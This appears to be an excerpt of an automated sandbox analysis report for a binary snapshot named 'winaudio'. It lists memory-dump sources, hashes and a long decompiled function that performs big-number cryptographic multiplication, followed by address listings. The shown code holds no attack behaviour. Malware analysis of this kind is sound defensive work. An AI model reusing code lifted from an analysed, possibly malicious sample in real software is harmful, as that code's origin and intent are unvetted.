                        0x0038261c
                        0x0038260c
                        0x0038260f
                        0x00000000
                        0x00000000
                        0x00382613
                        0x00000000
                        0x00382613
                        0x0038258a
                        0x00000000
                        0x00000000
                        0x00382590
                        0x00382593
                        0x003825d3
                        0x003825d3
                        0x003825d6
                        0x003825ef
                        0x00000000
                        0x003825ef
                        0x003825d8
                        0x003825d8
                        0x003825db
                        0x00000000
                        0x00000000
                        0x003825de
                        0x003825e1
                        0x00000000
                        0x00000000
                        0x003825e3
                        0x003825e6
                        0x00000000
                        0x003825e6
                        0x00382595
                        0x003825ce
                        0x00000000
                        0x003825ce
                        0x0038259a
                        0x00000000
                        0x00000000
                        0x003825a3
                        0x00000000
                        0x00000000
                        0x003825a8
                        0x00000000
                        0x00000000
                        0x003825ad
                        0x00000000
                        0x00000000
                        0x003825b6
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 98b07632f41b03bb1b3f317813ecbb1ee4127c41df4813825c1f5710b64b203a
                        • Instruction ID: 34360b66a60f1cc8f7c0cfd6df3ea76aaf8b7ca2e7c012d409ea4ab1da5f88fc
                        • Opcode Fuzzy Hash: 98b07632f41b03bb1b3f317813ecbb1ee4127c41df4813825c1f5710b64b203a
                        • Instruction Fuzzy Hash: E351CD702407455BDF377938846ABBFA3DDDB53300F1908DAF882CB682E695EE468361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002BD8C0 Relevance: .5, Instructions: 495COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 55%
                        			E002BD8C0(char _a4, void* _a8, intOrPtr _a24) {
				signed int _v4080;
				intOrPtr _v4084;
				intOrPtr _v4088;
				signed int _v4092;
				signed int* _v4096;
				signed int _v4100;
				signed int* _v4104;
				signed int _v4108;
				signed int _v4112;
				intOrPtr _t313;
				signed int _t314;
				signed int _t316;
				unsigned int _t318;
				signed int _t320;
				unsigned int _t322;
				signed int _t327;
				signed int _t329;
				signed int _t333;
				signed int _t337;
				signed int _t343;
				unsigned int _t345;
				signed int _t347;
				signed int _t354;
				signed int _t358;
				signed int _t367;
				unsigned int _t369;
				unsigned int _t371;
				void* _t372;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				signed int _t385;
				void* _t388;
				signed int _t390;
				intOrPtr _t395;
				signed int _t398;
				signed int _t399;
				unsigned int _t400;
				signed int _t402;
				signed int _t406;
				signed int _t407;
				unsigned int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t416;
				void* _t420;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int* _t425;
				signed int _t426;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				signed int _t434;
				intOrPtr* _t437;
				signed int* _t440;
				signed int* _t441;
				signed int* _t442;
				signed int _t443;
				signed int _t445;
				signed int* _t446;
				signed int* _t447;
				signed int _t452;
				signed int _t457;
				intOrPtr _t458;
				void* _t466;
				unsigned int _t474;
				unsigned int _t475;
				void* _t477;
				signed int _t480;
				intOrPtr _t481;
				signed int _t483;
				void* _t484;
				intOrPtr _t485;
				signed int _t489;
				void* _t490;
				intOrPtr _t491;
				intOrPtr _t495;
				signed int* _t496;
				void* _t499;

				_t421 = _a24;
				if(_t421 >= 4) {
					_t437 =  &_a4;
					_t423 =  ~(_t421 + 2);
					_t424 =  ~_t423;
					_t452 = _t495 + _t423 * 0x00000004 - 0x00000020 - (_t495 + _t423 * 0x00000004 - 0x00000020 -  &_a8 & 0x000007ff) - (( &_a8 ^ _t495 + _t423 * 0x00000004 - 0x00000020 - (_t495 + _t423 * 0x00000004 - 0x00000020 -  &_a8 & 0x000007ff)) & 0x00000800 ^ 0x00000800) & 0xffffffc0;
					_t395 = _t495;
					_t496 = _t452 + (_t495 - _t452 & 0xfffff000);
					_t499 = _t496 - _t452;
					if(_t499 > 0) {
						do {
							_t496 =  &_v4112;
						} while (_t496 > _t452);
						L4:
						_v4108 =  *_t437;
						_v4104 =  *((intOrPtr*)(_t437 + 4));
						_v4100 =  *((intOrPtr*)(_t437 + 8));
						_v4096 =  *((intOrPtr*)(_t437 + 0xc));
						_v4092 =  *((intOrPtr*)( *((intOrPtr*)(_t437 + 0x10))));
						_t367 = _t424 - 3;
						_v4088 = _t395;
						asm("bt dword [eax], 0x1a");
						if(_t499 >= 0) {
							_t440 = _v4104;
							_t425 = _v4100;
							_t374 = 0;
							_t30 = _t367 * 4; // 0x5
							_t313 = _t425 + _t30 + 4;
							_t426 =  *_t425;
							if((_t367 + 0x00000001 & 0x00000001 | _t440 - _t425) == 0) {
								_v4112 = _t367;
								_v4100 = 0;
								_t314 = _t426;
								_t398 = _t314 * _t426 >> 0x20;
								_v4080 = _t314 * _t426;
								_t399 = _t398 >> 1;
								_t369 = _t398 & 0x00000001;
								_t375 = 1;
								0;
								do {
									_t316 = _t440[_t375];
									_t457 = _t399;
									_t399 = _t316 * _t426 >> 0x20;
									_t318 = _t316 * _t426 + _t457;
									_t375 = _t375 + 1;
									asm("adc edx, 0x0");
									_t458 = _t369 + _t318 * 2;
									_t369 = _t318 >> 0x1f;
									 *((intOrPtr*)(_t496 + 0x1c + _t375 * 4)) = _t458;
								} while (_t375 < _v4112);
								_t320 = _t440[_t375];
								_t400 = _t320 * _t426 >> 0x20;
								_t322 = _t320 * _t426 + _t399;
								asm("adc edx, 0x0");
								_t441 = _v4096;
								_t428 = _v4092 * _v4080;
								 *((intOrPtr*)(_t496 + 0x20 + _t375 * 4)) = _t369 + _t322 * 2;
								 *((intOrPtr*)(_t496 + 0x24 + _t375 * 4)) = (_t322 >> 0x1f) + _t400 * 2;
								 *(_t496 + 0x28 + _t375 * 4) = _t400 >> 0x1f;
								_t402 =  *_t441 * _t428 >> 0x20;
								_t367 = _t375;
								asm("adc edx, 0x0");
								_t327 = _t441[1];
								_t376 = 1;
								while(1) {
									L24:
									asm("adc edx, 0x0");
									_t329 =  *(_t441 + 4 + _t376 * 4);
									asm("adc edx, 0x0");
									 *((intOrPtr*)(_t496 + 0x1c + _t376 * 4)) = _t402 +  *((intOrPtr*)(_t496 + 0x20 + _t376 * 4)) + _t327 * _t428;
									_t402 = _t329 * _t428 >> 0x20;
									_t466 = (_t327 * _t428 >> 0x20) +  *((intOrPtr*)(_t496 + 0x24 + _t376 * 4));
									_t376 = _t376 + 2;
									asm("adc edx, 0x0");
									_t327 = _t441[_t376];
									asm("adc edx, 0x0");
									 *((intOrPtr*)(_t496 + 0x18 + _t376 * 4)) = _t466 + _t329 * _t428;
									if(_t376 < _t367) {
										continue;
									}
									L25:
									asm("adc edx, 0x0");
									asm("adc edx, 0x0");
									 *((intOrPtr*)(_t496 + 0x1c + _t367 * 4)) = _t402 +  *(_t496 + 0x20 + _t367 * 4) + _t327 * _t428;
									_t377 = _v4100;
									_t442 = _v4104;
									asm("adc eax, [esp+ebx*4+0x28]");
									 *(_t496 + 0x20 + _t367 * 4) = (_t327 * _t428 >> 0x20) +  *(_t496 + 0x24 + _t367 * 4);
									 *(_t496 + 0x24 + _t367 * 4) = 0;
									if(_t377 == _t367) {
										L31:
										_t429 = _v4108;
										_t443 =  &_v4080;
										_t333 =  *_t443;
										_t378 = _t367;
										_t406 = 0;
										0;
										0;
										do {
											asm("sbb eax, [ebp+edx*4]");
											 *(_t429 + _t406 * 4) = _t333;
											_t378 = _t378 - 1;
											_t333 =  *(_t443 + 4 + _t406 * 4);
											_t406 = _t406 + 1;
										} while (_t378 >= 0);
										asm("sbb eax, 0x0");
										_t445 = _t443 & _t333 | _t429 &  !_t333;
										0;
										0;
										do {
											 *((intOrPtr*)(_t429 + _t367 * 4)) =  *((intOrPtr*)(_t445 + _t367 * 4));
											 *(_t496 + 0x20 + _t367 * 4) = _t378;
											_t367 = _t367 - 1;
										} while (_t367 >= 0);
										return 1;
									}
									_t430 =  *(_t442 + 4 + _t377 * 4);
									_t379 = _t377 + 1;
									_t337 = _t430;
									_v4100 = _t379;
									_t407 = _t337 * _t430 >> 0x20;
									asm("adc edx, 0x0");
									 *((intOrPtr*)(_t496 + 0x20 + _t379 * 4)) = _t337 * _t430 +  *((intOrPtr*)(_t496 + 0x20 + _t379 * 4));
									_t474 = 0;
									_t380 = _t379 + 1;
									if(_t379 == _t367) {
										L30:
										_t441 = _v4096;
										_t428 = _v4092 * _v4080;
										asm("adc ebp, 0x0");
										 *((intOrPtr*)(_t496 + 0x20 + _t380 * 4)) = _t407 +  *((intOrPtr*)(_t496 + 0x20 + _t380 * 4));
										 *(_t496 + 0x24 + _t380 * 4) = _t474;
										_t402 =  *_t441 * _t428 >> 0x20;
										_t367 = _t380 - 1;
										asm("adc edx, 0x0");
										_t376 = 1;
										_t327 = _t441[1];
										do {
											goto L24;
										} while (_t376 < _t367);
										goto L25;
									}
									_t409 = _t407 >> 1;
									_t371 = _t407 & 0x00000001;
									do {
										_t343 =  *(_t442 + _t380 * 4);
										_t475 = _t409;
										_t409 = _t343 * _t430 >> 0x20;
										_t345 = _t343 * _t430 + _t475;
										asm("adc edx, 0x0");
										_t477 = _t345 + _t345 +  *((intOrPtr*)(_t496 + 0x20 + _t380 * 4));
										_t380 = _t380 + 1;
										asm("adc eax, 0x0");
										asm("adc eax, 0x0");
										 *((intOrPtr*)(_t496 + 0x1c + _t380 * 4)) = _t477 + _t371;
										_t371 = _t345 >> 0x1f;
									} while (_t380 <= _v4112);
									_t474 = _t409 >> 0x1f;
									_t407 = _t409 + _t409 + _t371;
									asm("adc ebp, 0x0");
									goto L30;
									L24:
									asm("adc edx, 0x0");
									_t329 =  *(_t441 + 4 + _t376 * 4);
									asm("adc edx, 0x0");
									 *((intOrPtr*)(_t496 + 0x1c + _t376 * 4)) = _t402 +  *((intOrPtr*)(_t496 + 0x20 + _t376 * 4)) + _t327 * _t428;
									_t402 = _t329 * _t428 >> 0x20;
									_t466 = (_t327 * _t428 >> 0x20) +  *((intOrPtr*)(_t496 + 0x24 + _t376 * 4));
									_t376 = _t376 + 2;
									asm("adc edx, 0x0");
									_t327 = _t441[_t376];
									asm("adc edx, 0x0");
									 *((intOrPtr*)(_t496 + 0x18 + _t376 * 4)) = _t466 + _t329 * _t428;
								}
							}
							_v4084 = _t313;
							_t347 =  *_t440;
							_t411 = 0;
							do {
								_t480 = _t411;
								_t411 = _t347 * _t426 >> 0x20;
								_t481 = _t480 + _t347 * _t426;
								_t374 = _t374 + 1;
								asm("adc edx, 0x0");
								_t347 = _t440[_t374];
								 *((intOrPtr*)(_t496 + 0x1c + _t374 * 4)) = _t481;
							} while (_t374 < _t367);
							_t446 = _v4096;
							asm("adc edx, 0x0");
							_t433 = _v4092 * _v4080;
							 *(_t496 + 0x20 + _t367 * 4) = _t347 * _t426 + _t411;
							 *(_t496 + 0x24 + _t367 * 4) = _t347 * _t426 >> 0x20;
							 *((intOrPtr*)(_t496 + 0x28 + _t367 * 4)) = 0;
							_t413 =  *_t446 * _t433 >> 0x20;
							_t354 = _t446[1];
							asm("adc edx, 0x0");
							_t382 = 1;
							while(1) {
								L18:
								_t483 = _t413;
								_t413 = _t354 * _t433 >> 0x20;
								_t484 = _t483 +  *((intOrPtr*)(_t496 + 0x20 + _t382 * 4));
								_t382 = _t382 + 1;
								asm("adc edx, 0x0");
								_t485 = _t484 + _t354 * _t433;
								_t354 = _t446[_t382];
								asm("adc edx, 0x0");
								 *((intOrPtr*)(_t496 + 0x18 + _t382 * 4)) = _t485;
								if(_t382 < _t367) {
									continue;
								}
								L19:
								asm("adc edx, 0x0");
								asm("adc edx, 0x0");
								 *((intOrPtr*)(_t496 + 0x1c + _t367 * 4)) = _t413 +  *(_t496 + 0x20 + _t367 * 4) + _t354 * _t433;
								asm("adc eax, [esp+ebx*4+0x28]");
								_t384 = _v4100 + 4;
								 *(_t496 + 0x20 + _t367 * 4) = (_t354 * _t433 >> 0x20) +  *(_t496 + 0x24 + _t367 * 4);
								 *(_t496 + 0x24 + _t367 * 4) = 0;
								if(_t384 == _v4084) {
									goto L31;
								}
								_t434 =  *_t384;
								_t447 = _v4104;
								_v4100 = _t384;
								_t385 = 0;
								_t416 = 0;
								_t358 =  *_t447;
								do {
									_t489 = _t416;
									_t416 = _t358 * _t434 >> 0x20;
									_t490 = _t489 +  *((intOrPtr*)(_t496 + 0x20 + _t385 * 4));
									_t385 = _t385 + 1;
									asm("adc edx, 0x0");
									_t491 = _t490 + _t358 * _t434;
									_t358 = _t447[_t385];
									asm("adc edx, 0x0");
									 *((intOrPtr*)(_t496 + 0x1c + _t385 * 4)) = _t491;
								} while (_t385 < _t367);
								asm("adc edx, 0x0");
								_t446 = _v4096;
								asm("adc edx, 0x0");
								_t433 = _v4092 * _v4080;
								 *(_t496 + 0x20 + _t367 * 4) = _t416 + _t358 * _t434 +  *(_t496 + 0x20 + _t367 * 4);
								asm("adc ecx, 0x0");
								 *(_t496 + 0x24 + _t367 * 4) = (_t358 * _t434 >> 0x20) +  *(_t496 + 0x24 + _t367 * 4);
								 *((intOrPtr*)(_t496 + 0x28 + _t367 * 4)) = 0;
								_t413 =  *_t446 * _t433 >> 0x20;
								_t354 = _t446[1];
								asm("adc edx, 0x0");
								_t382 = 1;
								0;
								do {
									goto L18;
								} while (_t382 < _t367);
								goto L19;
								L18:
								_t483 = _t413;
								_t413 = _t354 * _t433 >> 0x20;
								_t484 = _t483 +  *((intOrPtr*)(_t496 + 0x20 + _t382 * 4));
								_t382 = _t382 + 1;
								asm("adc edx, 0x0");
								_t485 = _t484 + _t354 * _t433;
								_t354 = _t446[_t382];
								asm("adc edx, 0x0");
								 *((intOrPtr*)(_t496 + 0x18 + _t382 * 4)) = _t485;
							}
						}
						asm("movd mm7, eax");
						asm("movd mm4, dword [edi]");
						asm("movd mm5, dword [esi]");
						asm("movd mm3, dword [ebp]");
						asm("pmuludq mm5, mm4");
						asm("movq mm2, mm5");
						asm("movq mm0, mm5");
						asm("pand mm0, mm7");
						asm("pmuludq mm5, [esp+0x14]");
						asm("pmuludq mm3, mm5");
						asm("paddq mm3, mm0");
						asm("movd mm1, dword [ebp+0x4]");
						asm("movd mm0, dword [esi+0x4]");
						asm("psrlq mm2, 0x20");
						asm("psrlq mm3, 0x20");
						_t388 = 1;
						0;
						do {
							asm("pmuludq mm0, mm4");
							asm("pmuludq mm1, mm5");
							asm("paddq mm2, mm0");
							asm("paddq mm3, mm1");
							asm("movq mm0, mm2");
							asm("pand mm0, mm7");
							asm("movd mm1, dword [ebp+ecx*4+0x4]");
							asm("paddq mm3, mm0");
							asm("movd mm0, dword [esi+ecx*4+0x4]");
							asm("psrlq mm2, 0x20");
							asm("movd [esp+ecx*4+0x1c], mm3");
							asm("psrlq mm3, 0x20");
							_t388 = _t388 + 1;
						} while (_t388 < _t367);
						asm("pmuludq mm0, mm4");
						asm("pmuludq mm1, mm5");
						asm("paddq mm2, mm0");
						asm("paddq mm3, mm1");
						asm("movq mm0, mm2");
						asm("pand mm0, mm7");
						asm("paddq mm3, mm0");
						asm("movd [esp+ecx*4+0x1c], mm3");
						asm("psrlq mm2, 0x20");
						asm("psrlq mm3, 0x20");
						asm("paddq mm3, mm2");
						asm("movq [esp+ebx*4+0x20], mm3");
						_t420 = 1;
						do {
							asm("movd mm4, dword [edi+edx*4]");
							asm("movd mm5, dword [esi]");
							asm("movd mm6, dword [esp+0x20]");
							asm("movd mm3, dword [ebp]");
							asm("pmuludq mm5, mm4");
							asm("paddq mm5, mm6");
							asm("movq mm0, mm5");
							asm("movq mm2, mm5");
							asm("pand mm0, mm7");
							asm("pmuludq mm5, [esp+0x14]");
							asm("pmuludq mm3, mm5");
							asm("paddq mm3, mm0");
							asm("movd mm6, dword [esp+0x24]");
							asm("movd mm1, dword [ebp+0x4]");
							asm("movd mm0, dword [esi+0x4]");
							asm("psrlq mm2, 0x20");
							asm("psrlq mm3, 0x20");
							asm("paddq mm2, mm6");
							_t390 = 1;
							_t372 = _t367 - 1;
							do {
								asm("pmuludq mm0, mm4");
								asm("pmuludq mm1, mm5");
								asm("paddq mm2, mm0");
								asm("paddq mm3, mm1");
								asm("movq mm0, mm2");
								asm("movd mm6, dword [esp+ecx*4+0x24]");
								asm("pand mm0, mm7");
								asm("movd mm1, dword [ebp+ecx*4+0x4]");
								asm("paddq mm3, mm0");
								asm("movd mm0, dword [esi+ecx*4+0x4]");
								asm("psrlq mm2, 0x20");
								asm("movd [esp+ecx*4+0x1c], mm3");
								asm("psrlq mm3, 0x20");
								asm("paddq mm2, mm6");
								_t372 = _t372 - 1;
								_t390 = _t390 + 1;
							} while (_t372 != 0);
							_t367 = _t390;
							asm("pmuludq mm0, mm4");
							asm("pmuludq mm1, mm5");
							asm("paddq mm2, mm0");
							asm("paddq mm3, mm1");
							asm("movq mm0, mm2");
							asm("pand mm0, mm7");
							asm("paddq mm3, mm0");
							asm("movd [esp+ecx*4+0x1c], mm3");
							asm("psrlq mm2, 0x20");
							asm("psrlq mm3, 0x20");
							asm("movd mm6, dword [esp+ebx*4+0x24]");
							asm("paddq mm3, mm2");
							asm("paddq mm3, mm6");
							asm("movq [esp+ebx*4+0x20], mm3");
							_t420 = _t420 + 1;
						} while (_t420 <= _t367);
						asm("emms");
						goto L31;
					}
					goto L4;
				}
				return 0;
			}



























































































                        0x002bd8c6
                        0x002bd8cd
                        0x002bd8d3
                        0x002bd8de
                        0x002bd8e4
                        0x002bd901
                        0x002bd90d
                        0x002bd90f
                        0x002bd916
                        0x002bd918
                        0x002bd930
                        0x002bd930
                        0x002bd93a
                        0x002bd942
                        0x002bd952
                        0x002bd956
                        0x002bd95a
                        0x002bd95e
                        0x002bd962
                        0x002bd966
                        0x002bd969
                        0x002bd973
                        0x002bd977
                        0x002bdb00
                        0x002bdb07
                        0x002bdb0b
                        0x002bdb14
                        0x002bdb14
                        0x002bdb1a
                        0x002bdb1c
                        0x002bdc70
                        0x002bdc73
                        0x002bdc77
                        0x002bdc79
                        0x002bdc7b
                        0x002bdc81
                        0x002bdc83
                        0x002bdc86
                        0x002bdc8d
                        0x002bdc90
                        0x002bdc90
                        0x002bdc93
                        0x002bdc95
                        0x002bdc97
                        0x002bdc99
                        0x002bdc9c
                        0x002bdc9f
                        0x002bdca8
                        0x002bdcaa
                        0x002bdcaa
                        0x002bdcb4
                        0x002bdcb9
                        0x002bdcbb
                        0x002bdcc1
                        0x002bdcc4
                        0x002bdccb
                        0x002bdcd3
                        0x002bdcdf
                        0x002bdce3
                        0x002bdce7
                        0x002bdced
                        0x002bdcef
                        0x002bdcf2
                        0x002bdcf5
                        0x002bdd00
                        0x002bdd00
                        0x002bdd08
                        0x002bdd0d
                        0x002bdd11
                        0x002bdd14
                        0x002bdd1a
                        0x002bdd1c
                        0x002bdd20
                        0x002bdd23
                        0x002bdd28
                        0x002bdd2b
                        0x002bdd30
                        0x002bdd34
                        0x00000000
                        0x00000000
                        0x002bdd3a
                        0x002bdd42
                        0x002bdd47
                        0x002bdd4a
                        0x002bdd4e
                        0x002bdd54
                        0x002bdd5c
                        0x002bdd60
                        0x002bdd66
                        0x002bdd6a
                        0x002bde20
                        0x002bde24
                        0x002bde28
                        0x002bde2c
                        0x002bde2e
                        0x002bde30
                        0x002bde38
                        0x002bde3c
                        0x002bde40
                        0x002bde40
                        0x002bde44
                        0x002bde47
                        0x002bde48
                        0x002bde4c
                        0x002bde4c
                        0x002bde55
                        0x002bde60
                        0x002bde68
                        0x002bde6c
                        0x002bde70
                        0x002bde73
                        0x002bde76
                        0x002bde7a
                        0x002bde7a
                        0x00000000
                        0x002bde85
                        0x002bdd70
                        0x002bdd74
                        0x002bdd77
                        0x002bdd79
                        0x002bdd7d
                        0x002bdd83
                        0x002bdd86
                        0x002bdd8a
                        0x002bdd8e
                        0x002bdd91
                        0x002bdddc
                        0x002bdde0
                        0x002bdde4
                        0x002bddef
                        0x002bddf2
                        0x002bddf6
                        0x002bddfa
                        0x002bde00
                        0x002bde03
                        0x002bde06
                        0x002bde0b
                        0x002bdd00
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002bdd00
                        0x002bdd99
                        0x002bdd9b
                        0x002bdda0
                        0x002bdda0
                        0x002bdda3
                        0x002bdda5
                        0x002bdda7
                        0x002bddac
                        0x002bddb2
                        0x002bddb6
                        0x002bddb9
                        0x002bddbe
                        0x002bddc4
                        0x002bddc8
                        0x002bddc8
                        0x002bddd4
                        0x002bddd7
                        0x002bddd9
                        0x00000000
                        0x002bdd00
                        0x002bdd08
                        0x002bdd0d
                        0x002bdd11
                        0x002bdd14
                        0x002bdd1a
                        0x002bdd1c
                        0x002bdd20
                        0x002bdd23
                        0x002bdd28
                        0x002bdd2b
                        0x002bdd30
                        0x002bdd30
                        0x002bdd00
                        0x002bdb22
                        0x002bdb26
                        0x002bdb28
                        0x002bdb30
                        0x002bdb30
                        0x002bdb32
                        0x002bdb34
                        0x002bdb36
                        0x002bdb39
                        0x002bdb3c
                        0x002bdb41
                        0x002bdb41
                        0x002bdb55
                        0x002bdb59
                        0x002bdb5c
                        0x002bdb61
                        0x002bdb67
                        0x002bdb6b
                        0x002bdb71
                        0x002bdb77
                        0x002bdb7a
                        0x002bdb7d
                        0x002bdc00
                        0x002bdc00
                        0x002bdc00
                        0x002bdc02
                        0x002bdc04
                        0x002bdc08
                        0x002bdc0b
                        0x002bdc0e
                        0x002bdc10
                        0x002bdc13
                        0x002bdc18
                        0x002bdc1c
                        0x00000000
                        0x00000000
                        0x002bdc22
                        0x002bdc2a
                        0x002bdc2f
                        0x002bdc32
                        0x002bdc40
                        0x002bdc44
                        0x002bdc47
                        0x002bdc4f
                        0x002bdc53
                        0x00000000
                        0x00000000
                        0x002bdc59
                        0x002bdc5b
                        0x002bdc5f
                        0x002bdc63
                        0x002bdc65
                        0x002bdc67
                        0x002bdb90
                        0x002bdb90
                        0x002bdb92
                        0x002bdb94
                        0x002bdb98
                        0x002bdb9b
                        0x002bdb9e
                        0x002bdba0
                        0x002bdba3
                        0x002bdba8
                        0x002bdba8
                        0x002bdbbe
                        0x002bdbc1
                        0x002bdbc7
                        0x002bdbca
                        0x002bdbd5
                        0x002bdbd9
                        0x002bdbde
                        0x002bdbe2
                        0x002bdbe6
                        0x002bdbec
                        0x002bdbef
                        0x002bdbf2
                        0x002bdbfd
                        0x002bdc00
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002bdc00
                        0x002bdc00
                        0x002bdc02
                        0x002bdc04
                        0x002bdc08
                        0x002bdc0b
                        0x002bdc0e
                        0x002bdc10
                        0x002bdc13
                        0x002bdc18
                        0x002bdc18
                        0x002bdc00
                        0x002bd982
                        0x002bd995
                        0x002bd998
                        0x002bd99b
                        0x002bd99f
                        0x002bd9a2
                        0x002bd9a5
                        0x002bd9a8
                        0x002bd9ab
                        0x002bd9b0
                        0x002bd9b3
                        0x002bd9b6
                        0x002bd9ba
                        0x002bd9be
                        0x002bd9c2
                        0x002bd9c6
                        0x002bd9cd
                        0x002bd9d0
                        0x002bd9d0
                        0x002bd9d3
                        0x002bd9d6
                        0x002bd9d9
                        0x002bd9dc
                        0x002bd9df
                        0x002bd9e2
                        0x002bd9e7
                        0x002bd9ea
                        0x002bd9ef
                        0x002bd9f3
                        0x002bd9f8
                        0x002bd9fc
                        0x002bd9ff
                        0x002bda07
                        0x002bda0a
                        0x002bda0d
                        0x002bda10
                        0x002bda13
                        0x002bda16
                        0x002bda19
                        0x002bda1c
                        0x002bda21
                        0x002bda25
                        0x002bda29
                        0x002bda2c
                        0x002bda31
                        0x002bda32
                        0x002bda34
                        0x002bda38
                        0x002bda3b
                        0x002bda40
                        0x002bda44
                        0x002bda47
                        0x002bda4a
                        0x002bda4d
                        0x002bda50
                        0x002bda53
                        0x002bda58
                        0x002bda5b
                        0x002bda5e
                        0x002bda63
                        0x002bda67
                        0x002bda6b
                        0x002bda6f
                        0x002bda73
                        0x002bda76
                        0x002bda77
                        0x002bda78
                        0x002bda78
                        0x002bda7b
                        0x002bda7e
                        0x002bda81
                        0x002bda84
                        0x002bda87
                        0x002bda8c
                        0x002bda8f
                        0x002bda94
                        0x002bda97
                        0x002bda9c
                        0x002bdaa0
                        0x002bdaa5
                        0x002bdaa9
                        0x002bdaac
                        0x002bdaad
                        0x002bdaad
                        0x002bdab6
                        0x002bdab8
                        0x002bdabb
                        0x002bdabe
                        0x002bdac1
                        0x002bdac4
                        0x002bdac7
                        0x002bdaca
                        0x002bdacd
                        0x002bdad2
                        0x002bdad6
                        0x002bdada
                        0x002bdadf
                        0x002bdae2
                        0x002bdae5
                        0x002bdaea
                        0x002bdaed
                        0x002bdaf5
                        0x00000000
                        0x002bdaf5
                        0x00000000
                        0x002bd91e
                        0x002bde8e

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6741330e04a0d3e390b46521f75dadb36026378a5abc937ddfc5901ef98e62d5
                        • Instruction ID: a75461a932995c467378781683018fb0e06b0a4919c4f475b7d6ac76f43314e1
                        • Opcode Fuzzy Hash: 6741330e04a0d3e390b46521f75dadb36026378a5abc937ddfc5901ef98e62d5
                        • Instruction Fuzzy Hash: 33029D721187098FC756EE1CD49026AF3E1FFC8345F198A3CD68587B64E739A9198F82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002CA5C0 Relevance: .4, Instructions: 443COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                        • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                        • Opcode Fuzzy Hash: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                        • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002CAB50 Relevance: .3, Instructions: 336COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
